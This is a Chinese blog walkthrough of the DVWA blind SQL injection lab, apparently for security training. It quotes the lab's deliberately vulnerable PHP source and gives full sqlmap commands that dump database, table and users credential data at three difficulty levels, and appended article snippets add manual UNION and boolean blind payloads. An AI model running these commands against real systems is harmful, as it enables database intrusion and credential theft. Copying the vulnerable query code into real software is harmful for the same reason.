DVWA靶场通关(SQL Injection(Blind))

最新推荐文章于 2025-04-28 16:07:04 发布
最新推荐文章于 2025-04-28 16:07:04 发布
阅读量2.4k 收藏 6
点赞数 1
分类专栏: DVWA 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_56010012/article/details/123637019
版权
本文详细介绍了SQL盲注的三种难度级别,从LOW到HIGH,包括利用sqlmap工具逐步渗透数据库,获取表名、列信息及具体数据的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

LOW

核心代码


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/low.php
<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];
    $exists = false;

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors

            $exists = false;
            if ($result !== false) {
                try {
                    $exists = (mysqli_num_rows( $result ) > 0);
                } catch(Exception $e) {
                    $exists = false;
                }
            }
            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

}

?>

在这里,直接选用linux中的sqlmap工具进行SQL注入。

(1)列出当前数据库名的命令

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --current-db

红色的位置,针对不同的主机,存在不同的数据。爆出的数据库名为:dvwa

(2) 列出表名的命令行

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa --tables

存在两张表,guestbook和users

 (3)获取users表中的数据

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa -T users --dump --batch

 Medium


SQL Injection Source
vulnerabilities/sqli/source/medium.php
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

解析 PHP代码,提交方式由get变成了post。

(1)针对提交方式由get===》post,因此需要添加--data命令

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit"

 (2)查看数据库

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -dbs

 (3) 爆出表名

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -tables

 (4)查看表users的columns值

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users -columns

(5)查看具体内容并解密

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users  -C user,password -dump

 

HIGH


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/high.php
<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];
    $exists = false;

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors

            $exists = false;
            if ($result !== false) {
                // Get results
                try {
                    $exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
                } catch(Exception $e) {
                    $exists = false;
                }
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
}

?>

相较于前面两种,这里id 值由cookie 传递,设置了睡眠时间,增加了盲注的时间耗费。

(1)

sqlmap -u"http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-u="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1"

(2)查看数据库

sqlmap -u"http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-u="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -dbs

 

 后续步骤与前两种相同,在字段后面添加必要命令。

DVWA靶场通关(2023)
2301_80548709的博客
02-23 2771
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
DVWA通关--SQL盲注(SQL Injection(Blind))
箭雨镜屋
07-11 3832
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA 通关sql injection
干铮的博客
07-28 493
1.LOW 看见页面有回显我们可以用联合查询的方法 1.判断列数 ?id=1 order by 1 2.判断显示位置 ?id=1' and 1=2 union select 1,2 --+ 3.查看数据库中敏感信息 ?id=1' and 1=2 union select database(),version() --+ 4.查询数据库名 ?id=1' and1=2 union select database() --+ 5.查询表名 ?id=1' and 1.
DVWA靶场保姆级通关教程--01暴力破解
最新发布
m0_74020575的博客
04-28 2311
DVWA(全称)是一个专门为安全人员、渗透测试人员、网络安全爱好者设计的练习靶场。它是一个搭建在 Web 服务器上的超弱安全性的网站,里面故意做了很多漏洞,供人练习攻击和防护技巧。简单说,就是一个故意很脆弱的网站,让你安全地、合法地去学 Web 攻击和防御!接下来是他不同等级的攻略方式和思路,仅供参考。以下方法我均使用的bp自带的浏览器。第二个参数的猜解如下,没猜一个密码回车就行,会自动占一行。
DVWASQL Injection(Blind)
baynk的博客
10-29 1264
汇总链接: https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA-SQL Injection (Blind)
qq_45751902的博客
04-25 950
目录简介sql盲注SQL盲注的类型安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible 简介 sql盲注 SQL InjectionBlind),即SQL盲注; 注入:可以查看到详细内容; 盲注:目标只会回复是或不是,没有详细内容; SQL盲注的类型 基于布尔值的盲注; 基于时间的盲注; 基于报错的盲注; 安全级别:Low 安全级别:Medium 安全级别:High 安全级别:Impossible ...
DVWA-SQL Injection&SQL Injection (Blind)
re1wn
02-08 944
DVWA-SQL Injection&SQL Injection (Blind)
DVWA靶场通关
2301_80185313的博客
08-14 1490
dvvwa靶场通关详解
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1235
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA靶场全解析(新手向)
LS_Sy的博客
02-18 3317
我们直接在输入栏内随便填写数据,之后使用bp进行抓包抓到包后发送到instruder模块进行爆破,由于需要同时爆破用户名和密码两个字段,所以我们选择集束炸弹模式设置好字典后开始爆破,最后根据响应头的不同得到用户名和密码。
DVWASQL Injection (Blind)
kukudeshuo的博客
03-21 265
DVWASQL Injection (Blind) low 查看源代码可知,对输入字符串没有进行任何过滤 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result
DVWASQL Injection (Blind)
一期一会的博客
03-23 183
SQL盲注方法: ① 基于布尔的盲注 ② 基于时间的盲注 ③ 基于报错的盲注 1.基于布尔的盲注 这里我们先进行基于布尔的盲注,以等级为low举例 同sql注入一样,首先判断注入类型,利用二分法判断数据库名称的长度,判断数据库名称的字符组成,猜解数据库表名 (1)判断数据库名称的长度(假设这里为整型注入) 1’ and length(database())>10 # missing … 直到出现exists,得出数据库名称长度 (2)判断数据库名称的字符组成 1 and ascii(substr(da
dvwasql injection(blind)
Alsn86的博客
01-27 934
dvwasql injection(blind) sql injection(blind)之low等级 1.判断出是字符型 2.看当前数据库名字长度1’ and length(database())=4;# 显示正确 所以数据库名长度为4 3.判断数据库名字为dvwa 1’ and substr(database(),1,1)=‘d’;# 判断出数据库名字第一个字符为’d’ 1’ and substr(database(),2,1)=‘d’;# 判断出数据库名字第一个字符为’v’ 1’ and
DVWA-09-SQL injection(Blind)
dahe
03-05 432
1.概念 SQL Injecton(Blind),即SQL盲注,上一节的SQL injection 可以直接从页面上看到注入后的执行结果,但有时候,我们不能从显示页面上获取执行结果以及语句是否执行。所以我们还需要掌握盲注的知识。 分类 基于布尔的盲注 基于时间的盲注 基于报错的盲注:rand()函数作为group by的字段进行联用的时候会违反Mysql的约定而报错。rand()随机不确定性,使得group by会使用多次而报错 步骤 判断注入类型 猜解数据库中的表名 猜解表中的字段名 猜
DVWA2_SQL Injection (Blind)
weixin_44193247的博客
03-09 568
DVWA漏洞复现练习篇
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1475
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
dvwa靶场通关教程sql注入
12-29
### DVWA SQL Injection Level Walkthrough Tutorial In the context of Damn Vulnerable Web Application (DVWA), understanding how to exploit vulnerabilities safely and ethically within this training environment is crucial. For the SQL Injection challenge, one starts by examining the provided form or URL parameters that interact with a backend database. The vulnerability lies in improper handling of user-supplied data when querying the database. Specifically, an attacker can manipulate input fields such as `id` parameter which interacts directly without sufficient sanitization checks[^1]. To demonstrate exploitation at low security levels: A simple payload like `id=2 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema=(SELECT DATABASE())#&Submit=Submit` allows retrieval of all tables present inside the current MySQL database schema[^2]. This technique leverages the fact that multiple queries can be combined using the `UNION` operator while comments (`#`) are utilized to ignore any trailing part of the original query string. For higher difficulty settings where additional protections might apply—such as escaping single quotes—it becomes necessary to adapt payloads accordingly. Techniques may involve employing alternative encodings or bypassing filters through creative crafting of inputs. ```sql -- Example Payload for Low Security Setting -- id=2 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema=(SELECT DATABASE())# ``` Understanding these mechanisms not only highlights common web application flaws but also emphasizes best practices developers should follow regarding proper validation and sanitization routines on client-side submissions before processing them server-side.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值